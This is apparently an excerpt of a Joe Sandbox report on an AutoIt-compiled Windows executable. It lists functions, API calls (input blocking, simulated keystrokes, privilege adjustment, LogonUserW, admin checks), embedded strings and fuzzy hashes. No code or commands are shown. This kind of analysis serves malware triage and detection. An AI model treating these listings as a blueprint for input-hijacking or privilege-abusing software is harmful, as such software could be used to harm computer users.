Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: b1dc9c3e455ce0c16180762491a71a3b097abb23ca4363ade4321d12919335e0
Instruction ID: 5e0f3ca084d736b94986e321850e735b915e0b953b03cf2ad7d53a32d991b789
Opcode Fuzzy Hash: b1dc9c3e455ce0c16180762491a71a3b097abb23ca4363ade4321d12919335e0
Instruction Fuzzy Hash: FA118FB1414209AFEB28DF54DC89D6FBBBDFB48711B24852FF45996281EB70AC41CB60

Function 005E4254 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005E4271
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 005E42B2
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005E42BD

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 6584709a275824140ed4f2a25c7a09048f429dc0dcfc1a4c1ae1b7e44f8f67ed
Instruction ID: f5461215c257400e174ae2042f4cc6e02cae9673f7c01d0eb45b0d493568d9f7
Opcode Fuzzy Hash: 6584709a275824140ed4f2a25c7a09048f429dc0dcfc1a4c1ae1b7e44f8f67ed
Instruction Fuzzy Hash: EC115275E01228BFEB108FA59C45BEFBFBDEB49B60F108156FD04E7290C6705A419BA1

Function 005E4F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005E4F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005E4F5C
FreeSid.ADVAPI32(?), ref: 005E4F6C

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 012758581e91e920fde73759d2b5095bf79e259ee23ed6ede07dcb574aaad7cc
Instruction ID: cfd6fb7df5004df6214aff5efbf4d04334f0712912ce331acd77ff2a221b91f9
Opcode Fuzzy Hash: 012758581e91e920fde73759d2b5095bf79e259ee23ed6ede07dcb574aaad7cc
Instruction Fuzzy Hash: B5F04F7591130CBFEF04DFE0DC89AEEBBBDEF08201F004469A501E2180D7745A448B50

Function 005E1AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 005E1B01
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 005E1B14

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 1805ad0ef8ede7801230f01d2454e45017e8184c09cffdc1d6b339f2424abd7b
Instruction ID: efeae60699ae90c4142034fc32737ae90f9269fe976318a50d2b3da16ebf4f7d
Opcode Fuzzy Hash: 1805ad0ef8ede7801230f01d2454e45017e8184c09cffdc1d6b339f2424abd7b
Instruction Fuzzy Hash: 74F0497190024DABEB04CFA5C805BFEBBB9FF04315F00804AF95596292D3799615DF94

Function 005EA6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,005F9B52,?,0061098C,?), ref: 005EA6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,005F9B52,?,0061098C,?), ref: 005EA6EC

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: f6f8347fad6d54eae16b392d56341989c01620d5592ae2ab658e0998c9b99bfa
Instruction ID: c0164bc029b66f73878bfc2bf5fadd2198117708fd5d855aa917c8c9686de840
Opcode Fuzzy Hash: f6f8347fad6d54eae16b392d56341989c01620d5592ae2ab658e0998c9b99bfa
Instruction Fuzzy Hash: 6CF0893550422EBBDF209FA5CC48FDA7B6DFF09351F008156B51896151D6709A40CBE1

Function 005D8DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005D8F27), ref: 005D8DFE
CloseHandle.KERNEL32(?,?,005D8F27), ref: 005D8E10

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: be88bc38002f8adbc7207032a051856f85fbd3a11d9177529980f5b096c6055e
Instruction ID: 05089db9e8a97cbc7b97ff0f289fce54017966cae94a1b219621bde98ee58e0f
Opcode Fuzzy Hash: be88bc38002f8adbc7207032a051856f85fbd3a11d9177529980f5b096c6055e
Instruction Fuzzy Hash: C4E0BF75010611EFEB256B54EC0DDB77BADFB04361B15C91AF45584470DB615CD0DB50

Function 005AA385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,005A8F87,?,?,?,00000001), ref: 005AA38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 005AA393

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 240273865926983372bee2a85627ff71eca0e7972efb4aecb9c188525974cc11
Instruction ID: 93b42de9cd2ff3360d31841a6d517d04a051196f2b99d202b6b178e079f72d02
Opcode Fuzzy Hash: 240273865926983372bee2a85627ff71eca0e7972efb4aecb9c188525974cc11
Instruction Fuzzy Hash: 94B0923106420DEBEF402B91EC09BC83F6AEB44B62F049012F61D44060CFA254908A91

Function 005F45D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 005F45F0

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 37b771577e5b52a99d49463d0fcad8755d3e0618bfdc7779b042945f8f356fda
Instruction ID: 96d77490e33c626cacb1f41405d987ceec306878148e8a6bcca5706a04fc5faa
Opcode Fuzzy Hash: 37b771577e5b52a99d49463d0fcad8755d3e0618bfdc7779b042945f8f356fda
Instruction Fuzzy Hash: E5E09A3120021A9FD710BF59E808A9BBBE8BF94760B008416FD49D7310EAB0A8408B90

Function 005E51E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 005E5205

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: a32ec5da452dcef1f76705a5634f606c2c1dd7d1b3f9368043ecca380e047957
Instruction ID: 4b940588f33366c01bd9a26999d9b1e06acc4fc24d30bf3f2e1abf66cd0c3106
Opcode Fuzzy Hash: a32ec5da452dcef1f76705a5634f606c2c1dd7d1b3f9368043ecca380e047957
Instruction Fuzzy Hash: AFD052A8160FAA78FD1C03268E0FF760E09FB007C8F889A4A70C2890C2FCD06881E431

Function 005D9369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,005D8FA7), ref: 005D9389

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 2434dd31ae0724d7e14f752003d5d8f1e4d67adf36c9c0108f8abd68fb762309
Instruction ID: ae0e243ba2a8c67fbae9f0807c4f965457c672354de8cb8b6803f86d38513949
Opcode Fuzzy Hash: 2434dd31ae0724d7e14f752003d5d8f1e4d67adf36c9c0108f8abd68fb762309
Instruction Fuzzy Hash: E0D05E3226050EABEF018EA4DC01EEE3B6AEB04B01F408111FE15C50A0C775D835AB60

Function 005C0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 005C0734

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a8296baba5e96d1574c3f127f748d9d7148f3f66bbfb809ff24033acb91fbdea
Instruction ID: fd4a13fa95cf2ddf1e45918021b26e8173417164b28b7b43b72c8f5be5b911f7
Opcode Fuzzy Hash: a8296baba5e96d1574c3f127f748d9d7148f3f66bbfb809ff24033acb91fbdea
Instruction Fuzzy Hash: ECC04CF180010DDBDF05DBA0D988EEE7BBCBB08305F14545AA145B2140D7749B448A71

Function 005AA354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 005AA35A

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: df171bf788748b52d541ea84fe7d471b1a05872a29ff7642928afaad759328a5
Instruction ID: 96533b191ddea667545ee0008e13093f6ecc43d91aa4aa7d242895f5c1b56d4a
Opcode Fuzzy Hash: df171bf788748b52d541ea84fe7d471b1a05872a29ff7642928afaad759328a5
Instruction Fuzzy Hash: 3EA0113002020CAB8F002B82EC08888BFAEEA003A0B008022F80C00022CBB2A8A08A80

Function 00603BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00610980), ref: 00603C65
IsWindowVisible.USER32(?), ref: 00603C89

Strings

GETSELECTED, xrefs: 00603EE1
CHECK, xrefs: 00603EAB
ISCHECKED, xrefs: 00603E77
UNCHECK, xrefs: 00603EC1
GETCURRENTCOL, xrefs: 00603F66
ADDSTRING, xrefs: 00603D54
EDITPASTE, xrefs: 00603F9D
GETLINECOUNT, xrefs: 00603F04
SELECTSTRING, xrefs: 00603E44
ISVISIBLE, xrefs: 00603C75
GETCURRENTSELECTION, xrefs: 00603E21
FINDSTRING, xrefs: 00603DB4
ISENABLED, xrefs: 00603CA9
SHOWDROPDOWN, xrefs: 00603D1E
CURRENTTAB, xrefs: 00603CFB
GETLINE, xrefs: 00603FD9
GETCURRENTLINE, xrefs: 00603F2B
SETCURRENTSELECTION, xrefs: 00603DF4
SENDCOMMANDID, xrefs: 00604018
HIDEDROPDOWN, xrefs: 00603D3E
DELSTRING, xrefs: 00603D87
TABRIGHT, xrefs: 00603CDB
TABLEFT, xrefs: 00603CC5

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: e93c0bdac5b64c810509aa58739b161a978e7d656dd6b067f12e6667f7c8fa69
Instruction ID: 5a44c8b9635bb5e9eb47f86d59651f8f15b887bada2a2bf0b0154c8c934f3d34
Opcode Fuzzy Hash: e93c0bdac5b64c810509aa58739b161a978e7d656dd6b067f12e6667f7c8fa69
Instruction Fuzzy Hash: ADD18F302442128BCB18EF14C495AAFBBE6BFD5354F144459F9466B3E2DB31EE4ACB81

Function 0060ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0060AC55
GetSysColorBrush.USER32(0000000F), ref: 0060AC86
GetSysColor.USER32(0000000F), ref: 0060AC92
SetBkColor.GDI32(?,000000FF), ref: 0060ACAC
SelectObject.GDI32(?,?), ref: 0060ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 0060ACE6
GetSysColor.USER32(00000010), ref: 0060ACEE
CreateSolidBrush.GDI32(00000000), ref: 0060ACF5
FrameRect.USER32(?,?,00000000), ref: 0060AD04
DeleteObject.GDI32(00000000), ref: 0060AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 0060AD56
FillRect.USER32(?,?,?), ref: 0060AD88
GetWindowLongW.USER32(?,000000F0), ref: 0060ADB3

Part of subcall function 0060AF18: GetSysColor.USER32(00000012), ref: 0060AF51
Part of subcall function 0060AF18: SetTextColor.GDI32(?,?), ref: 0060AF55
Part of subcall function 0060AF18: GetSysColorBrush.USER32(0000000F), ref: 0060AF6B
Part of subcall function 0060AF18: GetSysColor.USER32(0000000F), ref: 0060AF76
Part of subcall function 0060AF18: GetSysColor.USER32(00000011), ref: 0060AF93
Part of subcall function 0060AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0060AFA1
Part of subcall function 0060AF18: SelectObject.GDI32(?,00000000), ref: 0060AFB2
Part of subcall function 0060AF18: SetBkColor.GDI32(?,00000000), ref: 0060AFBB
Part of subcall function 0060AF18: SelectObject.GDI32(?,?), ref: 0060AFC8
Part of subcall function 0060AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0060AFE7
Part of subcall function 0060AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0060AFFE
Part of subcall function 0060AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0060B013

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: d7493564a56217da6ab16084ce5e58f3b248ee72b3e67a49485e3aaf1616520a
Instruction ID: 27caf1716968549b26b9b917e6deb5597fae88eaf27a91f30c174e2b927f3891
Opcode Fuzzy Hash: d7493564a56217da6ab16084ce5e58f3b248ee72b3e67a49485e3aaf1616520a
Instruction Fuzzy Hash: A6A19171008305BFEB159FA4DD08AAB7BABFF88361F145A1AF552961E0D770D980CF52

Function 00582FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00583072
DeleteObject.GDI32(00000000), ref: 005830B8
DeleteObject.GDI32(00000000), ref: 005830C3
DestroyIcon.USER32(00000000,?,?,?), ref: 005830CE
DestroyWindow.USER32(00000000,?,?,?), ref: 005830D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 005BC77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 005BC7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 005BCBDE

Part of subcall function 00581F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00582412,?,00000000,?,?,?,?,00581AA7,00000000,?), ref: 00581F76

SendMessageW.USER32(?,00001053), ref: 005BCC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 005BCC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 005BCC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 005BCC53

Strings

0, xrefs: 005BCA72

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: a08903b43439fb12516629732099aa6b3414505706e371b6dae3814ab833b527
Instruction ID: 046f1f89ddd2efcf5007354942b74399f679bff7a4bfbb9e1040943972ef6ea4
Opcode Fuzzy Hash: a08903b43439fb12516629732099aa6b3414505706e371b6dae3814ab833b527
Instruction Fuzzy Hash: 5C128C30604201EFDB25DF24C889BA9BFA1BF48700F18856AF995DB262C771FD81DB95

Function 005927FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 005A0FE6: std::exception::exception.LIBCMT ref: 005A101C
Part of subcall function 005A0FE6: __CxxThrowException@8.LIBCMT ref: 005A1031

__wcsnicmp.LIBCMT ref: 0059286A
__wcsnicmp.LIBCMT ref: 0059287E
__wcsnicmp.LIBCMT ref: 00592896
__wcsnicmp.LIBCMT ref: 005928AE
__wcsnicmp.LIBCMT ref: 005928C6
__wcsnicmp.LIBCMT ref: 005928DE
__wcsnicmp.LIBCMT ref: 005928F6
__wcsnicmp.LIBCMT ref: 0059290A
__wcsnicmp.LIBCMT ref: 00592948
__wcsnicmp.LIBCMT ref: 0059295C
__wcsnicmp.LIBCMT ref: 00592970
__wcsnicmp.LIBCMT ref: 00592984

Strings

#comments-end, xrefs: 0059296A
#comments-start, xrefs: 005928F0, 00592942
Unterminated group of comments, xrefs: 005CFCFA
Bad directive syntax error, xrefs: 005CFBD3, 005CFBF0
#include, xrefs: 005928D8
Cannot parse #include, xrefs: 005CFCE5
#pragma compile, xrefs: 00592864
#cs, xrefs: 00592904, 00592956
#requireadmin, xrefs: 00592890
', xrefs: 005CFB9F
#OnAutoItStartRegister, xrefs: 005928A8
#include-once, xrefs: 005928C0
#ce, xrefs: 0059297E
#notrayicon, xrefs: 00592878
", xrefs: 005CFB89

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: 99ad5fc8f2eb2a92add94823c71792889bce36bd203e698601a094214c01c99b
Instruction ID: 6a4be212cfe79e40e596452a8509964c890e21934e93169d84eefddf2f4fc9b2
Opcode Fuzzy Hash: 99ad5fc8f2eb2a92add94823c71792889bce36bd203e698601a094214c01c99b
Instruction Fuzzy Hash: 3EA18E30A4020ABFCF14AF61DD56FAE7F7ABF85740F044029F905AA292EB719E51D790

Function 005F7B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 005F7BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 005F7C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 005F7CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 005F7CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 005F7D1D
GetClientRect.USER32(00000000,?), ref: 005F7D29
